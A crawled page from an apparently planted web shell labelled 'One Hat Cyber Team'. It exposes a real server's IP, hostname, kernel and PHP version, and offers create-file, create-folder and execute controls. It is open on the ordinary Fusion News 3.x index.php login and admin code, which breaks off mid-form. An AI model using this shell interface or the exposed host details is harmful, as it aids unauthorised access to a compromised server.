One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
go
/
news
/
Edit File:
index.php
<?php /* ||========================================================== || Fusion News 3.x ||---------------------------------------------------------- || File Version : $Id: index.php 217 2008-02-24 10:36:22Z xycaleth $ || Contact : xycaleth@gmail.com || Copyright: : (c) 2006 - 2008, FusionNews.net || License Info : http://www.gnu.org/copyleft/gpl.html ||========================================================== */ // Start the timer $split = explode (' ', microtime()); $start_time = (float)$split[0] + (float)$split[1]; include './common.php'; // change this if needed $users = FNEWS_ROOT_PATH . 'users.php'; // your users file // dont edit past here ******** // Pre-define the variables as it were $content = ''; $title = NULL; $l = NULL; $lb = NULL; $load = NULL; set_error_handler ('fn_error_handler'); $id = ( !isset ($VARS['id']) ) ? '' : $VARS['id']; $sid = ( isset ($_COOKIE['fus_sid']) ) ? $_COOKIE['fus_sid'] : ''; $uid = ( isset ($_COOKIE['fus_uid']) ) ? $_COOKIE['fus_uid'] : ''; $userdata = array(); $userdata = login_session_update ($uid, $sid); //login if ( $id == '' ) { /*id Home*/ if ( has_access (NEWS_REPORTER) ) { $title = $ind9; $plugin_active = true; include (FNEWS_ROOT_PATH . 'plugins/check_chmod.php'); $content .= check_file_access ('./'); $content .= $ind13; if ( has_access (NEWS_ADMIN) ) { $content .= $ind11; } elseif ( has_access (NEWS_EDITOR) ) { $content .= $ind12; } $content .= $ind14; } else { $title = $ind3; $content .= <<< html <form action="?id=login" method="post"> <p>$ind0</p> <table cellspacing="0" cellpadding="2"> <tr> <td><label for="username">$ind169a</label></td> <td><input type="text" class="post" id="username" name="username" size="20" /></td> </tr> <tr> <td><label for="password">$ind4</label></td> <td><input type="password" class="post" id="password" name="password" size="20" /></td> </tr> <tr> <td> </td> <td><input type="checkbox" name="keep_login" id="keep_login" value="1" /> <label for="keep_login">$ind120</label></td> </tr> <tr> <td align="center" colspan="2"> <p><input type="submit" class="mainoption" value="$ind3" /></p> </td> </tr> </table> </form> html; } } //------------------- //login elseif($id == 'login'){ /*id Login*/ if ( !has_access (NEWS_REPORTER) ) { $post_user = ( isset ($VARS['username']) ) ? substr ($VARS['username'], 0, 40) : ''; $post_pass = ( isset ($VARS['password']) ) ? substr ($VARS['password'], 0, 40) : ''; $keep_login = ( isset ($VARS['keep_login']) ) ? 1 : 0; if ( !$post_user || !$post_pass ) { $title = $ind17; $content = $ind18; } else { $file = file ($users); array_shift($file); foreach($file as $value){ list($user,$nick,$email,$icon,$offset,$pass,$le) = explode('|<|', $value); if ( $post_user == $user && md5 ($post_pass) == $pass ) { login_session_create ($user, $keep_login); header('Location: ./index.php'); } } $title = $ind17; $content = $ind18; } } else { $title = $ind17; $content = $ind294; } } //------------------- //admin elseif($id == 'admin'){ /*id Admin*/ if ( has_access (NEWS_ADMIN) ) { $title = $ind280; $content = <<< html <table style="width:100%"><tr><td> <div style="width:50%; float:left"> <h2>$ind302</h2> <ul> <li><a href="?id=admin_paths">$ind45</a></li> <li><a href="?id=admin_layout">$ind55</a></li> <li><a href="?id=admin_addons">$ind65</a></li> <li><a href="?id=admin_syndication">$ind324</a></li> </ul> <h2>$ind205</h2> <ul> <li><a href="?id=uploads">$ind204</a></li> </ul> <h2>$ind81</h2> <ul> <li><a href="?id=commentmanag">$ind207</a></li> </ul> <h2>$ind320</h2> <ul> <li><a href="?id=categories">$ind311</a></li> </ul> </div> <div style="float:right; width:50%"> <h2>$ind208</h2> <ul> <li><a href="?id=manage">$ind167</a></li> </ul> <h2>$ind210</h2> <ul> <li><a href="?id=smillies">$ind211</a></li> </ul> <h2>$ind212</h2> <ul> <li><a href="?id=edittmp">$ind213</a></li> </ul> <h2>$ind173</h2> <ul> <li><a href="?id=badwordfilter">$ind215</a></li> </ul> </div></td></tr></table> html; } else if ( has_access (NEWS_EDITOR) ) { $title = $ind161; $content = <<< html <table><tr><td> <div style="float:left; width:50%"> <h2>$ind81</h2> <ul> <li><a href="?id=commentmanag">$ind207</a></li> </ul> <h2>$ind205</h2> <ul> <li><a href="?id=uploads">$ind204</a></li> </ul> </div> <div style="margin-left:50%; width: 49%"> <h2>$ind173</h2> <ul> <li><a href="?id=badwordfilter">$ind215</a></li> </ul> </div></td></tr></table> html; } else { $title = $ind17; $content = $ind20; } } else if ( $id == 'admin_syndication' ) { if ( has_access (NEWS_ADMIN) ) { $step = ( isset ($VARS['step']) ) ? intval ($VARS['step']) : 1; $category_dropdown = build_categories_list (NULL, -1, 1); $include_dir = FNEWS_ROOT_PATH; $title = $ind324; $content .= <<< html <table class="adminpanel"> <tr> <th colspan="2">$ind324</th> </tr> <tr> <td style="width:40%">$ind327</td> <td style="width:60%">$category_dropdown</td> </tr> <tr> <th colspan="2"> <input type="button" onclick="createNewsCode(); createRSSCode();" class="mainoption" value="$ind329" /> </th> </tr> </table> <p></p> <table class="adminpanel"> <tr> <th colspan="2">$ind325</th> </tr> <tr> <th colspan="2">$ind328</th> </tr> <tr> <td colspan="2" align="center"> <textarea id="newscode" cols="60" rows="6" readonly="readonly"></textarea><br /> <input type="button" onclick="highlightAll('newscode');" value="$ind330" /> </td> </tr> <tr> <th colspan="2">$ind326</th> </tr> <tr> <th colspan="2">$ind331</th> </tr> <tr> <td colspan="2" align="center"> <textarea id="rsscode" cols="60" rows="6" readonly="readonly"></textarea><br /> <input type="button" onclick="highlightAll('rsscode');" value="$ind330" /> </td> </tr> </table> html; } else { $title = $ind17; $content = $ind20; } } elseif($id == 'admin_paths'){ /*id Admin Directories*/ if(has_access( NEWS_ADMIN )){ $title = $ind45; $content = "<form action=\"?id=save_admin1\" method=\"post\">\n"; $content .= "<p>$ind46</p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"site1\">$ind47</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"site1\" name=\"site1\" value=\"$site\" size=\"80\" /><br />\n"; $content .= "$ind48\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"furl1\">$ind49</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"furl1\" name=\"furl1\" value=\"$furl\" size=\"80\" /><br />\n"; $content .= "$ind50\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"url\">$ind53</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"url\" name=\"url\" value=\"$hurl\" size=\"80\" /><br />\n"; $content .= "$ind54\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend> $ind83</legend>\n"; $content .= "$ind84<br /><br />\n"; $content .= "<input type=\"submit\" class=\"mainoption\" value=\"$ind36\" />\n"; $content .= "<input type=\"reset\" class=\"mainoption\" value=\"$ind16\" />\n"; $content .= "</fieldset>\n"; $timestamp = time(); $content .= '<input type="hidden" name="post_form" value="' . get_form_character ($timestamp) . '" />' . "\n"; $content .= '<input type="hidden" name="post_time" value="' . $timestamp . '" />' . "\n"; $content .= "</form>\n"; }else{ $title = $ind17; $content = $ind20; } } //save elseif($id == 'save_admin1'){ /*id Admin Save DIR/URL*/ if(has_access( NEWS_ADMIN )){ if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $site = ( isset ($VARS['site1']) ) ? $VARS['site1'] : $site; $furl = ( isset ($VARS['furl1']) ) ? $VARS['furl1'] : $furl; $hurl = ( isset ($VARS['url']) ) ? $VARS['url'] : $hurl; if ( !$site || !$furl || !$hurl ) { $title = $ind17; $content = $error23; } else { $configs = config_array(); $configs['site'] = $site; $configs['furl'] = $furl; $configs['hurl'] = $hurl; save_config( $configs ); $title = $ind21; $content = make_redirect ($ind22); } } }else{ $title = $ind17; $content = $ind20; } } elseif($id == 'admin_layout'){ /*id Admin Layout*/ if(has_access( NEWS_ADMIN )){ $title = $ind55; $content = NULL; $content .= "<form action=\"?id=save_admin2\" method=\"post\">\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"df\">$ind56 (<a href=\"http://www.php.net/date\" onclick=\"window.open (this.href); return false\">$ind57</a>)</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"df\" name=\"df\" value=\"$datefor\" size=\"20\" />\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"ppp_date\">$ind86 (<a href=\"http://www.php.net/date\" onclick=\"window.open (this.href); return false\">$ind57</a>)</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"ppp_date\" name=\"ppp_date\" value=\"$ppp_date\" size=\"20\" />\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind59</legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"posts\" name=\"posts\" value=\"$numofposts\" size=\"2\" /> <label for=\"posts\">$ind58</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"news_pagination\" name=\"news_pagination\" value=\"1\"" . checkbox_checked ($news_pagination) . " /> <label for=\"news_pagination\">$ind332</label>"; $content .= '<fieldset> <input type="checkbox" class="post" id="news_pagination_numbers" name="news_pagination_numbers" value="1" ' . checkbox_checked ($news_pagination_numbers) . ' /> <label for="news_pagination_numbers">' . $ind339 . '</label><br /> <input type="checkbox" class="post" id="news_pagination_arrows" name="news_pagination_arrows" value="1" ' . checkbox_checked ($news_pagination_arrows) . ' /> <label for="news_pagination_arrows">' . $ind340 . '</label><br /> <input type="text" class="post" id="news_pagination_prv" name="news_pagination_prv" value="' . $news_pagination_prv . '" size="10" /> <label for="news_pagination_prv">' . $ind341 . '</label><br /> <input type="text" class="post" id="news_pagination_nxt" name="news_pagination_nxt" value="' . $news_pagination_nxt . '" size="10" /> <label for="news_pagination_nxt">' . $ind342 . '</label> </fieldset>'; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind290</legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"h\" name=\"h\" value=\"$numofh\" size=\"2\" /> <label for=\"h\">$ind60</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"head_full_link\" name=\"head_full_link\" value=\"1\"" . checkbox_checked ($link_headline_fullstory) . " />\n"; $content .= "<label for=\"head_full_link\">$ind267</label><br />\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind61</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"bbc\" name=\"bbc\" value=\"1\"" . checkbox_checked ($bb) . " />\n"; $content .= "<label for=\"bbc\">$ind62</label>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"html\" name=\"html\" value=\"1\"" . checkbox_checked ($ht) . " />\n"; $content .= "<label for=\"html\">$ind63</label>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"sm\" name=\"sm\" value=\"1\"" . checkbox_checked ($smilies) . " />\n"; $content .= "<label for=\"sm\">$ind64</label>\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind81</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"bbccom\" name=\"bbccom\" value=\"1\"" . checkbox_checked ($bbc) . " />\n"; $content .= "<label for=\"bbccom\">$ind62</label>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"htmc\" name=\"htmc\" value=\"1\"" . checkbox_checked ($htc) . " />\n"; $content .= "<label for=\"htmc\">$ind63</label>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"smil\" name=\"smil\" value=\"1\"" . checkbox_checked ($smilcom) . " />\n"; $content .= "<label for=\"smil\">$ind64</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"cb_flip\">$ind268</label></legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"cb_flip\" name=\"cb_flip\" value=\"1\"" . checkbox_checked ($flip_news) . " /> <label for=\"cb_flip\">$ind269</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"post_per_day\">$ind260</label></legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"post_per_day\" name=\"post_per_day\" value=\"1\"" . checkbox_checked ($post_per_day) . " />\n"; $content .= "<label for=\"post_per_day\">$ind261</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend> $ind83</legend>\n"; $content .= "<input type=\"submit\" class=\"mainoption\" value=\"$ind36\" />\n"; $content .= "<input type=\"reset\" value=\"$ind16\" />\n"; $content .= "</fieldset>\n"; $timestamp = time(); $content .= '<input type="hidden" name="post_form" value="' . get_form_character ($timestamp) . '" />' . "\n"; $content .= '<input type="hidden" name="post_time" value="' . $timestamp . '" />' . "\n"; $content .= "</form>\n"; }else{ $title = $ind17; $content = $ind20; } } //temporary way of config file until fn 4.0 elseif($id == 'save_admin2'){ /*id Admin Save Layout*/ if(has_access( NEWS_ADMIN )){ if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $bbca = ( isset($VARS['bbc']) ) ? 1 : 0; $post_per_day = ( isset($VARS['post_per_day']) ) ? 1 : 0; $ppp_date = ( isset($VARS['ppp_date']) ) ? $VARS['ppp_date'] : $ppp_date; $hm = ( isset($VARS['html']) ) ? 1 : 0; $sm = ( isset($VARS['sm']) ) ? 1 : 0; $htcom = ( isset($VARS['htmc']) ) ? 1 : 0; $smiliescom = ( isset($VARS['smil']) ) ? 1 : 0; $bbcom = ( isset($VARS['bbccom']) ) ? 1 : 0; $head_full_link = ( isset($VARS['head_full_link']) ) ? 1 : 0; $datefor = ( isset ($VARS['df']) ) ? $VARS['df'] : $datefor; $numofposts = ( isset ($VARS['posts']) ) ? intval ($VARS['posts']) : $numofposts; $numofh = ( isset ($VARS['h']) ) ? intval ($VARS['h']) : $numofh; $cb_flip = (int)(isset ($VARS['cb_flip'])); $news_pagination = (int)(isset ($VARS['news_pagination'])); $news_pagination_numbers = (int)(isset ($VARS['news_pagination_numbers'])); $news_pagination_arrows = (int)(isset ($VARS['news_pagination_arrows'])); $news_pagination_prv = ( isset ($VARS['news_pagination_prv']) ) ? $VARS['news_pagination_prv'] : $news_pagination_prv; $news_pagination_nxt = ( isset ($VARS['news_pagination_nxt']) ) ? $VARS['news_pagination_nxt'] : $news_pagination_nxt; $configs = config_array(); $configs['datefor'] = $datefor; $configs['numofposts'] = $numofposts; $configs['numofh'] = $numofh; $configs['bb'] = $bbca; $configs['ht'] = $hm; $configs['post_per_day'] = $post_per_day; $configs['ppp_date'] = $ppp_date; $configs['smilies'] = $sm; $configs['htc'] = $htcom; $configs['smilcom'] = $smiliescom; $configs['bbc'] = $bbcom; $configs['link_headline_fullstory'] = $head_full_link; $configs['flip_news'] = $cb_flip; $configs['news_pagination'] = $news_pagination; $configs['news_pagination_numbers'] = $news_pagination_numbers; $configs['news_pagination_arrows'] = $news_pagination_arrows; $configs['news_pagination_nxt'] = $news_pagination_nxt; $configs['news_pagination_prv'] = $news_pagination_prv; save_config( $configs ); include './config.php'; $title = $ind21; $content = make_redirect ($ind22); } }else{ $title = $ind17; $content = $ind20; } } elseif($id == "admin_addons"){ /*id Admin Addons*/ if(has_access( NEWS_ADMIN )){ $skin_list = '<select id="s" name="s">' . "\n"; $dir = opendir (FNEWS_ROOT_PATH . 'skins'); while ( ($file = readdir ($dir)) !== false ) { if ( $file == '.' || $file == '..' ) { continue; } else if ( !is_dir (FNEWS_ROOT_PATH . 'skins/' . $file) ) { continue; } else if ( !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/index.php') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/index.html') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/index.htm') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/index.txt') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/skin.php') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/skin.html') && !file_exists (FNEWS_ROOT_PATH . 'skins/' . $file . '/skin.htm') ) { continue; } else { if ( $skin == $file ) { $skin_list .= '<option selected="selected">' . $file . '</option>' . "\n"; } else { $skin_list .= '<option>' . $file . '</option>' . "\n"; } } } closedir ($dir); $skin_list .= '</select>'; $title = $ind65; $content = NULL; $content .= "<form action=\"?id=save\" method=\"post\">\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"flink\">$ind66</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"flink\" name=\"flink\" value=\"$fslink\" size=\"22\" />\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind67</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"fspu\" name=\"fspu\" value=\"1\"" . checkbox_checked ($fsnw) . " />\n"; $content .= "<label for=\"fspu\">$ind68</label><br />\n"; $content .= "$ind69\n"; $content .= "<input type=\"text\" class=\"post\" id=\"fspuw\" name=\"fspuw\" value=\"$fullnewsw\" size=\"6\" />\n"; $content .= "$ind70\n"; $content .= "<input type=\"text\" class=\"post\" id=\"fspuh\" name=\"fspuh\" value=\"$fullnewsh\" size=\"6\" />\n"; $content .= "$ind71<br /><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"fpuscrolling\" name=\"fpuscrolling\" value=\"1\"" . checkbox_checked ($fullnewss) . " />\n"; $content .= "<label for=\"fpuscrolling\">$ind72</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"fpuresize\" name=\"fpuresize\" value=\"1\"" . checkbox_checked ($fullnewsz) . " />\n"; $content .= "<label for=\"fpuresize\">$ind73</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"slink\">$ind74</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"slink\" name=\"slink\" value=\"$stflink\" size=\"22\" />\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind75</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"stfpu\" name=\"stfpu\" value=\"1\"" . checkbox_checked ($stfpop) . " />\n"; $content .= "<label for=\"stfpu\">$ind68</label><br />\n"; $content .= "$ind69\n"; $content .= "<input type=\"text\" class=\"post\" id=\"spuw\" name=\"spuw\" value=\"$stfwidth\" size=\"6\" />\n"; $content .= "$ind70\n"; $content .= "<input type=\"text\" class=\"post\" id=\"spuh\" name=\"spuh\" value=\"$stfheight\" size=\"6\" />\n"; $content .= "$ind71 <br /><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"stfscrolls\" name=\"stfscrolls\" value=\"1\"" . checkbox_checked ($stfscrolls) . " />\n"; $content .= "<label for=\"stfscrolls\">$ind72</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"stfresize\" name=\"stfresize\" value=\"1\"" . checkbox_checked ($stfresize) . " />\n"; $content .= "<label for=\"stfresize\">$ind73</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"plink\">$ind77</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"plink\" name=\"plink\" value=\"$pclink\" size=\"22\" />\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind75a</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"compu\" name=\"compu\" value=\"1\"" . checkbox_checked ($compop) . " />\n"; $content .= "<label for=\"compu\">$ind76a</label><br />\n"; $content .= "$ind69\n"; $content .= "<input type=\"text\" class=\"post\" id=\"compuw\" name=\"compuw\" value=\"$comwidth\" size=\"6\" />\n"; $content .= "$ind70\n"; $content .= "<input type=\"text\" class=\"post\" id=\"compuh\" name=\"compuh\" value=\"$comheight\" size=\"6\" />\n"; $content .= "$ind71 <br /><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"comscrolls\" name=\"comscrolls\" value=\"1\"" . checkbox_checked ($comscrolls) . " />\n"; $content .= "<label for=\"comscrolls\">$ind72</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"comresize\" name=\"comresize\" value=\"1\"" . checkbox_checked ($comresize) . " />\n"; $content .= "<label for=\"comresize\">$ind73</label>\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind78</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"com_validation\" name=\"com_validation\" value=\"1\"" . checkbox_checked ($com_validation) . " />"; $content .= "<label for=\"com_validation\">$ind238</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"com_captcha\" name=\"com_captcha\" value=\"1\"" . checkbox_checked ($com_captcha) . " />"; $content .= "<label for=\"com_captcha\">$ind322</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"cpbr\" name=\"cpbr\" value=\"1\"" . checkbox_checked ($comallowbr) . " />\n"; $content .= "<label for=\"cpbr\">$ind79</label><br />\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"cbf\" name=\"cbf\" value=\"1\"" . checkbox_checked ($cbflood) . " />\n"; $content .= "<label for=\"cbf\">$ind91</label> <input type=\"text\" class=\"post\" id=\"flood\" name=\"flood\" value=\"$floodtime\" size=\"3\" />$ind92<br />\n"; $content .= "$ind91a<input type=\"text\" class=\"post\" id=\"comlength\" name=\"comlength\" value=\"$comlength\" size=\"6\" /><br />\n"; $content .= '<input type="checkbox" name="comments_pages" id="comments_pages" class="post" value="1"' . checkbox_checked ($comments_pages) . ' /> <label for="comments_pages">' . $ind355 . '</label><br />'; $content .= '<input type="text" name="comments_per_page" id="comments_per_page" class="post" size="3" value="' . $comments_per_page . '" /> <label for="comments_per_page">' . $ind356 . '</label>'; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"cbwww\">$ind87</label></legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"cbwww\" name=\"cbww\" value=\"1\"" . checkbox_checked ($cbwordwrap) . " />\n"; $content .= "<label for=\"cbwww\">$ind88</label> <input type=\"text\" class=\"post\" id=\"www\" name=\"www\" value=\"$wwwidth\" size=\"3\" />\n"; $content .= "$ind89<br />\n"; $content .= "</fieldset><p></p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind80</legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"wfcomcbx\" name=\"wfcomcbx\" value=\"1\"" . checkbox_checked ($wfcom) . " />\n"; $content .= "<label for=\"wfcomcbx\">$ind81</label>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"wfpostcbx\" name=\"wfpostcbx\" value=\"1\"" . checkbox_checked ($wfpost) . " />\n"; $content .= "<label for=\"wfpostcbx\">$ind82</label>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"cb_rss\">$ind265</label></legend>\n"; $content .= "<input type=\"checkbox\" class=\"post\" id=\"cb_rss\" name=\"cb_rss\" value=\"1\"" . checkbox_checked ($enable_rss) . " /> <label for=\"cb_rss\">$ind266</label><br /><br />\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"rss_title\">$ind305</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"rss_title\" name=\"rss_title\" value=\"$rss_title\" size=\"20\" />\n"; $content .= "</fieldset><br />\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"rss_description\">$ind306</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"rss_description\" name=\"rss_description\" value=\"$rss_description\" size=\"20\" />\n"; $content .= "</fieldset><br />\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"rss_encoding\">$ind307</label></legend>\n"; $content .= "<input type=\"text\" class=\"post\" id=\"rss_encoding\" name=\"rss_encoding\" value=\"$rss_encoding\" size=\"20\" />\n"; $content .= "</fieldset>\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend><label for=\"s\">$ind186</label></legend>\n"; $content .= "$skin_list\n"; $content .= "</fieldset><p> </p>\n"; $content .= "<fieldset>\n"; $content .= "<legend>$ind83</legend>\n"; $content .= "<input type=\"submit\" class=\"mainoption\" value=\"$ind36\" />\n"; $content .= "<input type=\"reset\" class=\"mainoption\" value=\"$ind16\" />\n"; $content .= "</fieldset>\n"; $timestamp = time(); $content .= '<input type="hidden" name="post_form" value="' . get_form_character ($timestamp) . '" />' . "\n"; $content .= '<input type="hidden" name="post_time" value="' . $timestamp . '" />' . "\n"; $content .= "</form>\n"; }else{ $title = $ind17; $content = $ind20; } } //------------------------ //save elseif($id == 'save'){ /*id Admin Save Addons*/ if(has_access( NEWS_ADMIN )){ if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { if (isset($VARS["fspu"])){$fspu = 1;}else{$fspu = 0;} if (isset($VARS["compu"])){$compu = 1;}else{$compu = 0;} if (isset($VARS["cpbr"])){$combr = 1;}else{$combr = 0;} if (isset($VARS["cpu"])){$fcpu = 1;}else{$fcpu = 0;} if (isset($VARS["stfpu"])){$fstfpu = 1;}else{$fstfpu = 0;} if (isset($VARS["fpuresize"])){$fspuz = 1;}else{$fspuz = 0;} if (isset($VARS["stfscrolls"])){$stfs = 1;}else{$stfs = 0;} if (isset($VARS["stfresize"])){$stfz = 1;}else{$stfz = 0;} if (isset($VARS["comscrolls"])){$comscrolls = 1;}else{$comscrolls = 0;} if (isset($VARS["comresize"])){$comresize = 1;}else{$comresize = 0;} if (isset($VARS["fspu"])){$fspu = 1;}else{$fspu = 0;} if (isset($VARS["wfpostcbx"])){$wfpost1 = 1;}else{$wfpost1 = 0;} if (isset($VARS["wfcomcbx"])){$wfcom1 = 1;}else{$wfcom1 = 0;} if (isset($VARS["cbf"])){$cbflood = 1;}else{$cbflood = 0;} if (isset($VARS["cbww"])){$cbww = 1;}else{$cbww = 0;} if (isset($VARS["cb_rss"])){$cb_rss = 1;}else{$cb_rss = 0;} if (isset($VARS["fpuscrolling"])){$fspus = 1; }else{$fspus = 0;} if(intval ($VARS["fspuw"]) < 100){$fspuw = "100";}else{$fspuw = intval ($VARS["fspuw"]);} if(intval ($VARS["fspuh"]) < 100){$fspuh = "100";}else{$fspuh = intval ($VARS["fspuh"]);} if(intval ($VARS["compuw"]) < 100){$compuw = "100";}else{$compuw = intval ($VARS["compuw"]);} if(intval ($VARS["compuh"]) < 100){$compuh = "100";}else{$compuh = intval ($VARS["compuh"]);} if(intval ($VARS["spuw"]) < 100){$spuw = "100";}else{$spuw = intval ($VARS["spuw"]);} if(intval ($VARS["flood"]) < 1){$flood = "1";}else{$flood = intval ($VARS["flood"]);} if(intval ($VARS["spuh"]) < 100){$spuh = "100";}else{$spuh = intval ($VARS["spuh"]);} if(intval ($VARS["www"]) < 5){$www = "5";}else{$www = intval ($VARS["www"]);} if($VARS["s"] == ""){$s = $skin;}else{$s = $VARS["s"];} if(intval ($VARS["comlength"]) < 0){$comlength = "0";}else{$comlength = intval ($VARS["comlength"]);} $com_validation = ( isset ($VARS['com_validation']) ) ? 1 : 0; $com_captcha = ( isset ($VARS['com_captcha']) ) ? 1 : 0; $comments_pages = (int)( isset ($VARS['comments_pages']) ); $comments_per_page = ( isset ($VARS['comments_per_page']) ) ? intval ($VARS['comments_per_page']) : 0; $fslink = ( isset ($VARS["flink"]) ) ? $VARS['flink'] : $fslink; $stflink = ( isset ($VARS["slink"]) ) ? $VARS['slink'] : $stflink; $pclink = ( isset ($VARS["plink"]) ) ? $VARS['plink'] : $pclink; $cfg_rss_title = ( isset ($VARS['rss_title']) ) ? $VARS['rss_title'] : $rss_title; $cfg_rss_description = ( isset ($VARS['rss_description']) ) ? $VARS['rss_description'] : $rss_description; $cfg_rss_encoding = ( isset ($VARS['rss_encoding']) && !empty ($VARS['rss_encoding']) ) ? $VARS['rss_encoding'] : $rss_encoding; $configs = config_array(); $configs['wfpost'] = $wfpost1; $configs['wfcom'] = $wfcom1; $configs['skin'] = $s; $configs['cbwordwrap'] = $cbww; $configs['wwwidth'] = $www; $configs['stfpop'] = $fstfpu; $configs['comallowbr'] = $combr; $configs['stfwidth'] = $spuw; $configs['stfheight'] = $spuh; $configs['fslink'] = $fslink; $configs['stflink'] = $stflink; $configs['pclink'] = $pclink; $configs['fsnw'] = $fspu; $configs['cbflood'] = $cbflood; $configs['floodtime'] = $flood; $configs['comlength'] = $comlength; $configs['fullnewsw'] = $fspuw; $configs['fullnewsh'] = $fspuh; $configs['fullnewss'] = $fspus; $configs['stfresize'] = $stfz; $configs['stfscrolls'] = $stfs; $configs['fullnewsz'] = $fspuz; $configs['compop'] = $compu; $configs['comscrolls'] = $comscrolls; $configs['comresize'] = $comresize; $configs['comheight'] = $compuh; $configs['comwidth'] = $compuw; $configs['enable_rss'] = $cb_rss; $configs['rss_title'] = $cfg_rss_title; $configs['rss_description'] = $cfg_rss_description; $configs['rss_encoding'] = $cfg_rss_encoding; $configs['com_validation'] = $com_validation; $configs['com_captcha'] = $com_captcha; $configs['comments_pages'] = $comments_pages; $configs['comments_per_page'] = $comments_per_page; save_config ($configs); include './config.php'; $title = $ind21; $content = make_redirect ($ind22); } }else{ $title = $ind17; $content = $ind20; } } //------------------------ //select template elseif($id == "edittmp"){ /*id Template Select*/ if ( has_access (NEWS_ADMIN) ) { $title = $ind23; $content = <<<html <form method="get" 